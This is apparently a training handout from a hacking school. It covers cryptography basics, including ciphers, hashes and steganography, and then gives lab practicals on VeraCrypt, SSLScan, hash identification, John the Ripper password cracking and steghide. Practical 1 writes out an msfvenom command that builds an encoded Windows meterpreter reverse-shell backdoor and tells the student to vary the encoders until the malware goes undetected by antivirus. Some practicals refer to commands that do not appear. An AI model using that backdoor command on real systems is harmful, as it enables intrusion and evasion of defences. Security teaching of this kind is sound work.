Cryptography

www.hackerschool.in
Cryptography
Cryptography is a process of converting plain text data (readable) into
ciphertext (unreadable) data to protect confidentiality so that unauthorized users
cannot understand what is transmitted. Encryption algorithms are used to perform
mathematical computation on data using the key and convert data to ciphertext.
The algorithm that is chosen to perform encryption with some key can also be used
for decryption. Decryption is the process of converting ciphertext to plaintext.
Encryption is a reversible operation, i.e., converting plaintext to ciphertext and vice
versa is possible using the algorithm and key. Cryptography is used to protect the
confidentiality of information shared on the internet such as email messages, chat
sessions, web transactions, personal data, corporate data, e-commerce applications,
etc.

Objectives of Cryptography
Confidentiality: To ensure that private or confidential information is not made
available or disclosed to unauthorized individuals.

Integrity: To ensure that an unauthorized individual does not tamper with the
information exchanged over the internet.

Availability: To ensure that services are not denied to authorized users.

Types of Cryptography
Based on the number of keys used for encryption, cryptographic algorithms are
classified into two types:
● Symmetric key cryptography
● Asymmetric key cryptography

Symmetric Encryption
The symmetric key algorithm is also known as the secret key algorithm.
Symmetric key algorithms use the same cryptographic key for both encryption and
decryption. Data Encryption Standard (DES) and Advanced Encryption Standard
(AES) are the most commonly used symmetric key algorithms: the sender uses a
key for encryption, and the receiver uses the same key for decryption. For two
parties (sender and receiver) to communicate confidentially, they must first
exchange the secret key so that each party can encrypt messages to send and
decrypt messages to read. This process is known as key exchange. The key is
shared between the two parties over a secure channel. Based on input data, these
algorithms can be further divided into two categories:

Block ciphers: Block ciphers encrypt data one block at a time.

Stream ciphers: Stream ciphers encrypt data byte by byte.

The strength of any cryptographic algorithm depends on the secrecy of the
key. If keys are not securely shared, then unauthorized parties can gain access to
the secret key used for encryption, decrypt the data, and read every packet
shared between the two parties.

Asymmetric Encryption
Asymmetric key algorithms use two different keys, known as a public key
and a private key, for encryption and decryption. The sender and receiver each
generate a private key, which is kept secret (not shared with anyone), and a public
key, which is shared with other parties. With asymmetric algorithms, senders
encrypt messages using the receiver's public key. Only the receiver's private key
can decrypt this encrypted message. In this manner, it ensures that both the
confidentiality and integrity of information are preserved. The best part of
asymmetric encryption is its key management system; it takes advantage of Public
Key Infrastructure for proper management of public keys.

Cipher
In cryptography, a cipher is an algorithm that performs encryption or
decryption in a series of well-defined steps that can be followed as a procedure.
Ciphers are classified based on the input data and the number of keys used for
encryption.

Classical ciphers
Classical ciphers are cryptographic algorithms that have been used in the
past (practically computed and solved manually). Classical ciphers are often
divided into substitution ciphers and transposition ciphers.
Substitution cipher: In a substitution cipher, letters are systematically replaced
throughout the message with other letters. In a monoalphabetic substitution
cipher, just one cipher alphabet is used. In a polyalphabetic substitution cipher,
multiple cipher alphabets are used.
Transposition ciphers: In a transposition cipher, the letters themselves are kept
unchanged, but their order within the message is scrambled. Many transposition
ciphers are done according to geometric design.
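
Added example (not part of the original handout): toy Python versions of the three classical cipher kinds described above, a Caesar shift (monoalphabetic), a Vigenère cipher (polyalphabetic) and a columnar transposition. The choice of these three ciphers, the A-Z-only alphabet, the key "KEY" and the sample plaintext are assumptions made for illustration.

```python
import string

A = string.ascii_uppercase  # toy alphabet: uppercase A-Z only

def caesar(text, shift):
    """Monoalphabetic substitution: one fixed cipher alphabet for the whole message."""
    return text.translate(str.maketrans(A, A[shift % 26:] + A[:shift % 26]))

def vigenere(text, key, decrypt=False):
    """Polyalphabetic substitution: each key letter selects a different cipher alphabet."""
    sign = -1 if decrypt else 1
    return "".join(
        A[(A.index(ch) + sign * A.index(key[i % len(key)])) % 26]
        for i, ch in enumerate(text)
    )

def _column_order(key):
    # Columns are read in alphabetical order of the key letters (ties: left to right).
    return sorted(range(len(key)), key=lambda i: (key[i], i))

def columnar_encrypt(text, key):
    """Transposition: write the text in rows under the key, read it out by column."""
    return "".join(text[c::len(key)] for c in _column_order(key))

def columnar_decrypt(cipher, key):
    plain, pos = [""] * len(cipher), 0
    for c in _column_order(key):
        size = len(range(c, len(cipher), len(key)))  # letters in column c
        plain[c::len(key)] = cipher[pos:pos + size]
        pos += size
    return "".join(plain)

if __name__ == "__main__":
    msg = "HELLOWORLD"  # constructed sample plaintext
    print(caesar(msg, 3))                # both L's of HELLO become the same letter
    print(vigenere(msg, "KEY"))          # the same L's become different letters
    print(columnar_encrypt(msg, "KEY"))  # same letters as the plaintext, new order
```

The substitution outputs contain different letters from the plaintext, while the transposition output is an exact rearrangement of it, which is why letter-frequency counts survive transposition unchanged.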

Modern ciphers
Modern ciphers are designed based on various concepts of mathematics such
as number theory, computational complexity theory, and probability theory. They
need computational power to encrypt and decrypt the data. Modern encryption
methods are divided into two types based on input data (block and stream ciphers),
and on the number of keys (secret key and public key) used.

Hash function
A hash function performs a series of mathematical operations to convert
input data into a fixed-length string of alphanumeric characters. The input to the
hash function is of arbitrary length, but the output is always of fixed length.

Features of Hash Functions
● Fixed-length output: A hash function converts data of arbitrary length to a
fixed length.
● Efficiency of operation: Computationally, hash functions are much
faster than asymmetric encryption.

Examples of Hash Functions
These are examples of well-known hash functions:
Hashed Message Authentication Code (HMAC): Combines authentication via a
shared secret with hashing.
Message Digest 2 (MD2): Byte-oriented, produces a 128-bit hash value from an
arbitrary-length message, designed for smart cards.
MD4: Similar to MD2, designed specifically for fast processing in software.
MD5: Similar to MD4 but slower because the data is manipulated more.
Secure Hash Algorithm (SHA): Modeled after MD4 and proposed by NIST for
the Secure Hash Standard (SHS), produces a 160-bit hash value.

Steganography
Steganography is the art of hiding a secret message within an ordinary
message and extracting it at the destination to maintain the confidentiality of data.
The program named ‘snow’ is used to conceal messages in ASCII text by
appending whitespace to the end of lines. There are different tools that can hide
text in pictures; to retrieve the hidden secret message, the receiver must use
the same tool that the sender used to hide the text message. Steganalysis is the art
of discovering and rendering secret messages hidden using steganography.
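
Added example (not part of the original handout, and not snow's own code): a defender-side check in Python that finds the trailing spaces and tabs described above and strips them. It does not decode snow's actual encoding; the thresholds and the sample text are constructed assumptions.

```python
def trailing_runs(text):
    """Return [(line_number, tail)] for every line that ends in spaces or tabs."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):  # handles LF and CRLF
        tail = line[len(line.rstrip(" \t")):]
        if tail:
            hits.append((n, tail))
    return hits

def assess(text, min_lines=2, min_mixed=1):
    """Flag trailing whitespace that looks like a data channel, not sloppy editing.

    Heuristic (an assumption of this example): several affected lines, and at
    least one tail that mixes spaces with tabs.
    """
    hits = trailing_runs(text)
    mixed = [n for n, tail in hits if " " in tail and "\t" in tail]
    return {
        "lines": [n for n, _ in hits],
        "hidden_chars": sum(len(tail) for _, tail in hits),
        "suspicious": len(hits) >= min_lines and len(mixed) >= min_mixed,
    }

def normalize(text):
    """Mitigation: strip trailing whitespace, destroying anything carried there."""
    return "\n".join(line.rstrip(" \t") for line in text.splitlines()) + "\n"

# Constructed samples: the second one carries whitespace at the end of two lines.
CLEAN = "Meeting moved to 3pm.\nBring the report.\n"
CARRIER = "Meeting moved to 3pm. \t  \t\r\nBring the report.\t \t\t \r\nThanks\n"

if __name__ == "__main__":
    print(assess(CLEAN))
    print(assess(CARRIER))
    print(assess(normalize(CARRIER)))
```

Running `normalize` on text at a mail or file gateway removes this channel without changing what a reader sees.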

Cryptography Attacks
Cryptography attacks are based on the assumption that the cryptanalyst has
access to the encrypted information.
● Chosen plaintext
● Adaptive chosen plaintext attack
● Known plaintext
● Known ciphertext
● Chosen ciphertext
● Chosen key
● Rubber hose cryptanalysis
A brute-force attack is a process of defeating a cryptographic scheme by trying
a large number of possible keys until the correct encryption key is discovered.

INDEX
S. No.  Practical Name
1  Encrypting a backdoor with msfvenom encoding options
2  Creating an encrypted virtual disk using VeraCrypt
3  Identifying SSL details using SSLScan
4  Identifying misconfigurations on the web server
5  Identifying Hash algorithms for given hash value
6  Cracking encrypted passwords using John the Ripper
7  Steghide
THIS DOCUMENT INCLUDES ADDITIONAL PRACTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS, APPROACH THE LAB COORDINATORS.

Practical 1: Encrypting a backdoor with msfvenom encoding options
Description: In this practical you will learn how to encode a backdoor using the
encoding modules available in the Metasploit framework, so that antivirus or
antimalware software fails to detect it most of the time.

Step 1: In this practical, we use encoding options in msfvenom to create an encrypted
malicious file. Options:
● -e: the name of the encoder
● -i: the number of iterations

Syntax: msfvenom -p <payload name> LHOST=<attacker IP> LPORT=<attacker port number> -f <format of the output> -o <output name> -e <encoder name> -i <number of iterations>
● To view the list of encoders, execute the below command: msfvenom --list encoders

Step 2: Execute the following command to create a backdoor named back.exe using
x86/shikata_ga_nai.
Command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=1234 -f exe -o /var/www/html/back.exe -e x86/shikata_ga_nai -i 7
● Try to add different encoding options, to make malware undetectable.

Practical 2: Creating an encrypted virtual disk using VeraCrypt.
Description: In this practical you will learn how to create an encrypted virtual disk that
gives no impression of being a storage disk. Even if someone finds it, they need the
password, and must know the encryption algorithms used in the process of
encryption, to decrypt the disk and see the information stored in it. All these features
are provided by a free tool called VeraCrypt.

Part 1: VeraCrypt Volume Creation
Step 1: Download the Windows version of the VeraCrypt software from VeraCrypt.
Double-click the downloaded file to install VeraCrypt.

Step 2: Launch VeraCrypt from Windows Start menu. To create an encrypted
VeraCrypt Volume, click on Create Volume as shown in below image.

Step 3: Select Create an encrypted file container on VeraCrypt volume creation
wizard.

Step 4: Select type of volume to be created. In this case, we choose Standard
VeraCrypt volume.

Step 5: VeraCrypt creates an encrypted container, which is later used to store files.
VeraCrypt treats this newly created volume as a normal file on the hard disk. Specify the
volume location by selecting an existing file from the disk. In this case, we have
selected a PDF document.

Note: The selected file will be replaced by the newly created volume (we will not be
able to access the file contents later). Read the information displayed on the wizard
carefully to know more about file selection.

Step 6: Choose an Encryption and Hash Algorithm for creating the new VeraCrypt
volume.

Step 7: Specify the size of VeraCrypt container.

Step 8: Provide a password which is used to protect the VeraCrypt volume. (Read the
information displayed on the wizard).

Step 9: Move the mouse randomly within volume creation wizard until randomness
indicator turns green. This increases the cryptographic strength of keys used for
encryption. Once done, click on Format.

Step 10: After creation of VeraCrypt volume click on Exit to close the volume wizard.

Part 2: Storing files in an Encrypted VeraCrypt Volume
Step 1: Select a Drive letter, click on Select File to select previously provided pdf
document (used as a container) then click on Mount to mount the hidden VeraCrypt
container.

Step 2: Provide the password and click on OK to unlock the encrypted container.

Step 3: After completing the above process, we can access the hidden disk as a normal
hard drive (K) as shown in the below image. We can store files in this drive (100 MB)
which will be encrypted and hidden for normal usage.

Step 4: Click on Dismount to hide the VeraCrypt volume.

Note: It is important to preserve the document used to create the volume and the
VeraCrypt software in order to access files stored in this VeraCrypt volume.

Practical 3: Identifying SSL details using SSLScan.
Description: In this practical you will learn how to query SSL/TLS services, such as HTTPS,
in order to determine the ciphers that are supported, using SSLScan tool.

Step 1: Execute the below commands to start SSLScan and retrieve details such as the
ciphers used and the SSL certificate.

Practical 4: Identifying misconfigurations on the web server.
Description: In this practical you will learn how to analyze the SSL configuration of a server
by connecting to it, and how to identify misconfigurations affecting SSL servers, using the
sslyze tool.
Step 1: Execute the below command to analyze web servers and identify misconfigurations.

Practical 5: Identifying Hash algorithms for given hash value
Description: In this practical you will learn how to create hash value for information that may
be files or words and identify which hash algorithm is used to create the hash you have, using
the hash-identifier tool.
Execute hash-identifier command on terminal and provide hash value to identify the algorithm
used to generate the concerned hash.

Practical 6: Cracking encrypted passwords using John the Ripper
Description: In this practical you will learn how to use the John the Ripper tool for cracking
different hashed passwords. This tool generates hashes for the words in the wordlist that
you have given (or in its default wordlist) and compares those hashes with the hash value you
have provided to the tool. It can crack different hash formats.
Web applications store passwords in the form of hashes. To retrieve the actual password
(plaintext) from the hash value, we can take the help of John the Ripper. Executing the below
command with necessary options will perform a rainbow attack against wordlist to identify the
actual password.
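
Added example (not part of the original handout, and not John the Ripper's code): a Python audit that applies the hash-and-compare step described above to constructed unsalted MD5 password hashes, next to salted PBKDF2 storage where hashing the wordlist once no longer matches anything. The wordlist, user names, passwords and iteration count are assumptions.

```python
import hashlib
import hmac
import os

WORDLIST = ["123456", "password", "letmein", "qwerty"]  # constructed sample

def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()

def audit_unsalted(stored, wordlist):
    """Return {user: password} for unsalted MD5 hashes that match a wordlist entry.

    Each word is hashed once; the result then matches every account that
    uses that password, which is the weakness being audited.
    """
    lookup = {md5_hex(w): w for w in wordlist}
    return {user: lookup[h] for user, h in stored.items() if h in lookup}

def store_password(password, iterations=600_000):
    """Hardened storage: per-user random salt plus a slow key-derivation function."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

def verify_password(password, record):
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

# Constructed database of unsalted hashes: one weak password, one strong one.
LEGACY_DB = {
    "alice": md5_hex("password"),
    "bob": md5_hex("correct horse battery staple 42"),
}

if __name__ == "__main__":
    print(audit_unsalted(LEGACY_DB, WORDLIST))  # accounts that need a reset
    a = store_password("password")
    b = store_password("password")
    print(a[2] != b[2])  # same password, different stored values
```

With a per-user salt, each guess has to be recomputed per account at the cost of the full iteration count, so weak passwords remain guessable but a single precomputed set of hashes no longer matches any record.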

Practical 7: Steghide
Description: In this practical we will learn how to use steghide tool to hide small text
files inside the image, and make it password protected.

Part 1: Embedding text file in jpg image
Step 1: Here we have two files on the Desktop location; one is an image file and the other
is a text file. Let us use these files to perform steganography.

Step 2: Execute the following command in the terminal to see the different options
available in the steghide tool.
● Command: steghide --help

Step 3: To hide the sample.txt file in rush.jpg, execute the following command in the
terminal.
● Command: steghide --embed -ef sample.txt -cf rush.jpg -sf stegimg.jpg
● Syntax: steghide --embed -ef <location of text file> -cf <location of image file> -sf <location of output file>
o --embed: used for hiding one file in another
o -ef: path of file which we want to hide
o -cf: path of file in which we want to hide
o -sf: path of file where we want to save the output

Step 4: After executing the above command, it will ask you to set a password. Enter
your password.

Step 5: After setting password it will create the output image file that has a text file
embedded in it.

Part 2: Extracting text file from jpg image
Step 1: Execute the following command to extract the embedded text file from
stegimg.jpg.
● Command: steghide --extract -sf stegimg.jpg
● Syntax: steghide --extract -sf <location of steganographic file>
o --extract: to extract file from the steganographic file
o -sf: path of steganographic file

Step 2: Now it will ask for the password, enter the password that we set during the
creation of stegfile.

Step 3: After entering the correct password, it will extract the text file from the stegfile
image.
